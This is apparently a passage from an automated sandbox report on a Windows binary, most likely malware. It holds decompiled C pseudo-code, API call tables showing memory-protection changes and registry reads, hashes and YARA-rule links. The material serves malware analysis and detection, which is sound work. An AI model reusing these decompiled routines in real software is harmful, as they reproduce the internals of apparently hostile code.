										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xb0d128(); // executed
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00B05AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00b0520d
0x00b05218
0x00b0521b
0x00b0521e
0x00b05221
0x00b05228
0x00b0522a
0x00b05236
0x00b05238
0x00b05238
0x00b05241
0x00b05247
0x00b0524c
0x00b05266
0x00b05272
0x00b05274
0x00b05279
0x00b05283
0x00b05283
0x00b0527b
0x00b0527b
0x00b0527b
0x00b0527b
0x00b0528a
0x00b05297
0x00b0529e
0x00b052a3
0x00b052a3
0x00b052ab
0x00b052ae
0x00b052d4
0x00b052e0
0x00b052e5
0x00b052ea
0x00b052ec
0x00b05318
0x00b0531a
0x00b052ee
0x00b052f2
0x00b052f7
0x00b052fc
0x00b05303
0x00b05309
0x00b0530e
0x00b05314
0x00b0531b
0x00b0531d
0x00b0531f
0x00b0532e
0x00b05334
0x00b05339
0x00b0533b
0x00b0536b
0x00b0536d
0x00b0533d
0x00b0533d
0x00b05343
0x00b05350
0x00b05356
0x00b05356
0x00b0535e
0x00b05367
0x00b0536e
0x00b05370
0x00b05372
0x00b05379
0x00b05386
0x00b0538b
0x00b05390
0x00b05392
0x00b05394
0x00000000
0x00000000
0x00b05396
0x00b0539b
0x00b0539d
0x00b053a4
0x00b053a8
0x00b053ab
0x00b053c0
0x00b053c4
0x00b053c9
0x00000000
0x00b053c9
0x00b053ad
0x00b053af
0x00000000
0x00000000
0x00b053ba
0x00b053bc
0x00b053be
0x00000000
0x00000000
0x00000000
0x00b053be
0x00b053a1
0x00b053a1
0x00b05372
0x00b052b0
0x00b052b0
0x00b052b5
0x00b053cb
0x00b053cf
0x00b053d7
0x00b053d7
0x00000000
0x00b053cf
0x00b052bb
0x00b052be
0x00b052c8
0x00b052cf
0x00000000
0x00b053df
0x00b053df
0x00b053e3
0x00b053e7
0x00b053e7

APIs

Part of subcall function 00B0154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,00B05226,00000000,00000000), ref: 00B01559

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00B052A3

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

memset.NTDLL ref: 00B052F2
RtlInitializeCriticalSection.NTDLL(018D9570), ref: 00B05303

Part of subcall function 00B03FC2: memset.NTDLL ref: 00B03FD7
Part of subcall function 00B03FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00B04019
Part of subcall function 00B03FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00B04024

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00B0532E
wsprintfA.USER32 ref: 00B0535E

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: b0af22376acb4382a2a36ffcace8c371a716b9e7200b762dc24e2b06b9cdf6fb
Instruction ID: b968eb62e99cae1e29da181deb7d64432b1667b6c025fc6b7a1435603b14e9bc
Opcode Fuzzy Hash: b0af22376acb4382a2a36ffcace8c371a716b9e7200b762dc24e2b06b9cdf6fb
Instruction Fuzzy Hash: 2251D471A00A14AFDB30ABE4DC99B6FBFE8EB14780F140895E502D75D1EBB0D9448F98

Uniqueness

Uniqueness Score: -1.00%

Function 00B078E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00B078E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00B075F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00B04AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00B075F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xb0d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00b078ed
0x00b078f4
0x00b078f9
0x00b078fc
0x00b07903
0x00b07906
0x00b07909
0x00b0790e
0x00b07913
0x00b07a67
0x00b07a69
0x00b07a6b
0x00b07a70
0x00b07a70
0x00b07919
0x00b0791c
0x00b0791f
0x00b07921
0x00b07921
0x00b07925
0x00000000
0x00000000
0x00b07929
0x00b07955
0x00b0795a
0x00b0795c
0x00b0795c
0x00b0795f
0x00b07962
0x00b07962
0x00b07964
0x00000000
0x00b0792f
0x00b07931
0x00b07950
0x00b07950
0x00b07967
0x00b07967
0x00b07968
0x00b07968
0x00b0796b
0x00000000
0x00000000
0x00000000
0x00b0796b
0x00b07935
0x00b0797c
0x00b07980
0x00b07a5a
0x00b07a5c
0x00b07a5c
0x00b07a5d
0x00b07a60
0x00000000
0x00b07a60
0x00b07989
0x00b0799a
0x00b0799e
0x00b07a56
0x00000000
0x00b07a56
0x00b079a4
0x00b079a7
0x00b079ab
0x00b079af
0x00b079b4
0x00b07a4c
0x00b07a4c
0x00000000
0x00b07a52
0x00b079bf
0x00b079c8
0x00b079dc
0x00b079e3
0x00b079f8
0x00b079fe
0x00b07a06
0x00000000
0x00000000
0x00000000
0x00000000
0x00b07a08
0x00b07a08
0x00b07a08
0x00b07a0f
0x00b07a17
0x00000000
0x00000000
0x00b07a19
0x00b07a22
0x00000000
0x00000000
0x00000000
0x00b07a24
0x00b07a26
0x00b07a29
0x00b07a29
0x00b07a2c
0x00b07a30
0x00b07a33
0x00b07a39
0x00b07a3c
0x00b07a43
0x00000000
0x00b079bf
0x00b0793a
0x00b07942
0x00b07948
0x00b0794a
0x00b0794a
0x00b0794d
0x00b0794f
0x00000000
0x00b0794f
0x00b07929
0x00b0796f
0x00b07974
0x00b07976
0x00b07976
0x00b07979
0x00b07979
0x00000000

APIs

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

lstrcpy.KERNEL32(69B25F45,00000020), ref: 00B079E3
lstrcat.KERNEL32(69B25F45,00000020), ref: 00B079F8
lstrcmp.KERNEL32(00000000,69B25F45), ref: 00B07A0F
lstrlen.KERNEL32(69B25F45), ref: 00B07A33

Strings

, xrefs: 00B0797C

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 28805ea5c49bdd59186d09dbc26a7c8b7bd85fb6ddaf8e7ed67d0879ca738c19
Instruction ID: d740d8c35f9f6dc2a6e6e2f7bbc013ba962e0e4a03ed01bed426280a5a1aaa25
Opcode Fuzzy Hash: 28805ea5c49bdd59186d09dbc26a7c8b7bd85fb6ddaf8e7ed67d0879ca738c19
Instruction Fuzzy Hash: BE519D31E48218EFCF11DF99C984AADFFF6EF55314F14819AE815AB291CB70AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6889B, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B65B86: VirtualProtect.KERNELBASE(00B6A538,?,00000040,?,00B807F4,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000), ref: 00B65BAB
Part of subcall function 00B65B86: GetLastError.KERNEL32(?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BB3
Part of subcall function 00B65B86: VirtualQuery.KERNEL32(00B6A538,00B807F4,0000001C,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BCA
Part of subcall function 00B65B86: VirtualProtect.KERNEL32(00B6A538,?,-2C9B417C,?,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BEF

GetLastError.KERNEL32(00000000,00000004,00B68D1F,?,810C74C3,00000000,?,00B7D580,0000001C,00B5B898,00000002,00B6A538,00000001,0000000C,00B807F0,0000000C), ref: 00B689F6

Part of subcall function 00B6D85B: lstrlen.KERNEL32(00B8065C,00B807F4,00000402,00B807F4), ref: 00B6D893
Part of subcall function 00B6D85B: lstrcpy.KERNEL32(00000000,00B8065C), ref: 00B6D8AA
Part of subcall function 00B6D85B: StrChrA.SHLWAPI(00000000,0000002E), ref: 00B6D8B3
Part of subcall function 00B6D85B: GetModuleHandleA.KERNEL32(00000000), ref: 00B6D8D1

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00B6A538,?,00B8065C,00B6A538,?,00000000,00000004,00B68D1F,?,810C74C3), ref: 00B68973
VirtualProtect.KERNELBASE(00B807F4,00000004,00B68D1F,00B68D1F,00B6A538,?,00000000,00000004,00B68D1F,?,810C74C3,00000000,?,00B7D580,0000001C,00B5B898), ref: 00B6898E
RtlEnterCriticalSection.NTDLL(00B81460), ref: 00B689B3
RtlLeaveCriticalSection.NTDLL(00B81460), ref: 00B689D1

Part of subcall function 00B65B86: SetLastError.KERNEL32(0000000C,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BF8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-0
Opcode ID: a69cefaf1a55fa4972715c7af9dab8e63f12758cd55dac1536ac26203c6c968a
Instruction ID: b8d6bee874e90bb6652bb6e2c9e20f9a62cb1c7e112013f8265f58135e2651b8
Opcode Fuzzy Hash: a69cefaf1a55fa4972715c7af9dab8e63f12758cd55dac1536ac26203c6c968a
Instruction Fuzzy Hash: 49418071900609EFDB11DF99C845AADBBF4FF08310F048259F919A7291DB38E951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B07CC7, Relevance: 7.6, APIs: 5, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B07CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xb0d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xb0d2e0; // 0xdca5a8
				_t3 = _t8 + 0xb0e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E00B03CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xb0d2e4, 1, 0, _t30);
					E00B04AAB(_t30);
				}
				_t12 =  *0xb0d294; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E00B01000(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E00B04A03(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E00B05AB2(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00b07cc8
0x00b07ccf
0x00b07cd9
0x00b07cdd
0x00b07ce3
0x00b07cf2
0x00b07cf9
0x00b07cfd
0x00b07d0f
0x00b07d11
0x00b07d11
0x00b07d16
0x00b07d1d
0x00b07d74
0x00b07d74
0x00b07d7a
0x00b07d7c
0x00b07d7c
0x00b07d81
0x00b07d86
0x00b07d8a
0x00b07d9c
0x00b07d9c
0x00b07da0
0x00b07da6
0x00b07da6
0x00000000
0x00b07d2d
0x00b07d2d
0x00b07d34
0x00000000
0x00000000
0x00b07d3b
0x00b07d43
0x00b07d47
0x00b07d4b
0x00b07d4b
0x00b07d53
0x00b07d58
0x00b07d5c
0x00b07d60
0x00b07db5
0x00b07dbb
0x00b07dbb
0x00b07d6e
0x00b07d72
0x00b07da9
0x00b07dab
0x00b07dae
0x00b07dae
0x00000000
0x00b07dab
0x00b07d72
0x00000000
0x00b07d5c

APIs

Part of subcall function 00B03CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,018D9B10,00000000,?,?,69B25F44,00000005,00B0D00C,?,?,00B0539B), ref: 00B03CF8
Part of subcall function 00B03CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 00B03D1C
Part of subcall function 00B03CC2: lstrcat.KERNEL32(00000000,00000000), ref: 00B03D24

CreateEventA.KERNEL32(00B0D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00B021B6,?,00000001,?), ref: 00B07D08

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

StrChrW.SHLWAPI(00B021B6,00000020,61636F4C,00000001,00000000,00000001,?,00000000,?,00B021B6,?,00000001,?), ref: 00B07D3B
WaitForSingleObject.KERNEL32(00000000,00004E20,00B021B6,00000000,00000000,?,00000000,?,00B021B6,?,00000001,?,?,?,?,00B0555B), ref: 00B07D68
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00B021B6,?,00000001,?), ref: 00B07D96
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00B021B6,?,00000001,?,?,?,?,00B0555B), ref: 00B07DAE

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: a6fff00410066288153f422d214d986526b78ee8c2019e9c96858a853f83f3d6
Instruction ID: c8b3fe43c9d3b9e5d74006bf3e05b3d7c6dc6e94d8494a664a5f7ce5c72b72ae
Opcode Fuzzy Hash: a6fff00410066288153f422d214d986526b78ee8c2019e9c96858a853f83f3d6
Instruction Fuzzy Hash: 062122B2A84742ABC7326BA88C44A7BBFD8EF94B10B0507F5F951E71D0EF20EC018250

Uniqueness

Uniqueness Score: -1.00%

Function 00B54C22, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5B8B7: RegCreateKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8CC
Part of subcall function 00B5B8B7: lstrlen.KERNEL32(0434B7F0,00000000,00000000,00000000,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86), ref: 00B5B8F5

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86,?), ref: 00B54C5A
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54C6E
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54C88
HeapFree.KERNEL32(00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54CA4
RegCloseKey.ADVAPI32(?,?,?,?,00B51F86,?,?,?), ref: 00B54CB2

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 71a1df08cb3c634cb92f21a14559d3437f5be11af34fc67a01d844576e6a4c68
Instruction ID: c5447ffadb57f12e6b9dff5599e288c33cf0da8eb143b8f584a8d24296447441
Opcode Fuzzy Hash: 71a1df08cb3c634cb92f21a14559d3437f5be11af34fc67a01d844576e6a4c68
Instruction Fuzzy Hash: 2A116DB6500149FFDB01AF95CC84DAE7BBEFB88359B1104A6FA0193220DB319D99DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B65B86, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00B6A538,?,00000040,?,00B807F4,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000), ref: 00B65BAB
GetLastError.KERNEL32(?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BB3
VirtualQuery.KERNEL32(00B6A538,00B807F4,0000001C,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BCA
VirtualProtect.KERNEL32(00B6A538,?,-2C9B417C,?,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BEF
SetLastError.KERNEL32(0000000C,?,00000000,00B807F4,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B65BF8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 5d50119795ff74772b996cbdc59cd6c08cb7c8cefb8ebe1ad95ab7b3a5fea19d
Instruction ID: feb741a7ec4efb1d5b0957e84a408065baa6c72d0edeb2b172c1b196a9d7e3ed
Opcode Fuzzy Hash: 5d50119795ff74772b996cbdc59cd6c08cb7c8cefb8ebe1ad95ab7b3a5fea19d
Instruction Fuzzy Hash: B301297250020DBF9B119F95CC44DAEBBBDEF08250B048066EA09E3120DB719A64DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B0121A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00B0121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fb0fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00B075F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E00B075F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E00B04AAB(_v20);
					}
					goto L12;
				}
			}

0x00b01220
0x00b01227
0x00b0122a
0x00b0122d
0x00b0122f
0x00b01234
0x00b01317
0x00b0131d
0x00b0131d
0x00b0123e
0x00b01245
0x00b0124d
0x00b0130e
0x00b01314
0x00000000
0x00b01314
0x00b01256
0x00b0125a
0x00b0125b
0x00b0125c
0x00b01262
0x00b01263
0x00b01268
0x00b0126f
0x00000000
0x00b01275
0x00b01284
0x00b01287
0x00b0128a
0x00b01293
0x00b01298
0x00b0129d
0x00b01305
0x00b0129f
0x00b012a2
0x00b012a6
0x00b012a7
0x00b012a8
0x00b012a9
0x00b012ab
0x00b012b2
0x00b012f8
0x00b012b4
0x00b012b4
0x00b012bf
0x00b012cd
0x00b012d1
0x00b012e9
0x00b012d3
0x00b012dc
0x00b012e4
0x00b012e4
0x00b012d1
0x00b012fe
0x00b012fe
0x00000000
0x00b0129d

APIs

GetLastError.KERNEL32 ref: 00B0130E

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

wcstombs.NTDLL ref: 00B012DC
GetLastError.KERNEL32 ref: 00B012F2

Strings

@MtNt, xrefs: 00B012F2, 00B0130E

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID: @MtNt
API String ID: 2631933831-3251738875
Opcode ID: 080d99f10aed4042cb05f7478fde91ccb3985b3c1ccf62d0d3ea42f58252cb8d
Instruction ID: 5dff01f6aee04ea386ea256371707339aa3916cbd2f1569423a281ad07a3eb39
Opcode Fuzzy Hash: 080d99f10aed4042cb05f7478fde91ccb3985b3c1ccf62d0d3ea42f58252cb8d
Instruction Fuzzy Hash: AF31FBB5900208FFDB15DF99CC84AAEBBF8FB14344F1049A9E542E3591DB309E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B0502E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00B037AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t24 + 0xb0edc8; // 0x18d9370
				_t5 = _t24 + 0xb0ed70; // 0x4f0053
				_t26 = E00B04B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xb0d2e0; // 0xdca5a8
						_t11 = _t32 + 0xb0edbc; // 0x18d9364
						_t48 = _t11;
						_t12 = _t32 + 0xb0ed70; // 0x4f0053
						_t52 = E00B0131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xb0d2e0; // 0xdca5a8
							_t13 = _t35 + 0xb0ee06; // 0x30314549
							_t37 = E00B0117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0xb0d294 - 6;
								if( *0xb0d294 <= 6) {
									_t42 =  *0xb0d2e0; // 0xdca5a8
									_t15 = _t42 + 0xb0ec12; // 0x52384549
									E00B0117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xb0d2e0; // 0xdca5a8
							_t17 = _t38 + 0xb0ee00; // 0x18d93a8
							_t18 = _t38 + 0xb0edd8; // 0x680043
							_t45 = E00B05DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xb0d270, 0, _t52);
						}
					}
					HeapFree( *0xb0d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00B051BB(_t54);
				}
				return _t45;
			}

0x00b0502e
0x00b0503e
0x00b05041
0x00b05048
0x00b0504a
0x00b0504a
0x00b0504d
0x00b05052
0x00b05059
0x00b05066
0x00b0506b
0x00b0506f
0x00b0507d
0x00b0508b
0x00b0508f
0x00b05120
0x00b05120
0x00b05095
0x00b05095
0x00b0509a
0x00b0509a
0x00b050a1
0x00b050ad
0x00b050af
0x00b050b1
0x00b050b3
0x00b050ba
0x00b050c5
0x00b050cc
0x00b050ce
0x00b050d5
0x00b050d7
0x00b050de
0x00b050e9
0x00b050e9
0x00b050d5
0x00b050ee
0x00b050f3
0x00b050fa
0x00b05118
0x00b0511a
0x00b0511a
0x00b050b1
0x00b0512c
0x00b0512c
0x00b0512e
0x00b05133
0x00b05135
0x00b05135
0x00b05140

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,018D9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00B0507D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,018D93A8,?,00000000,30314549,00000014,004F0053,018D9364), ref: 00B0511A
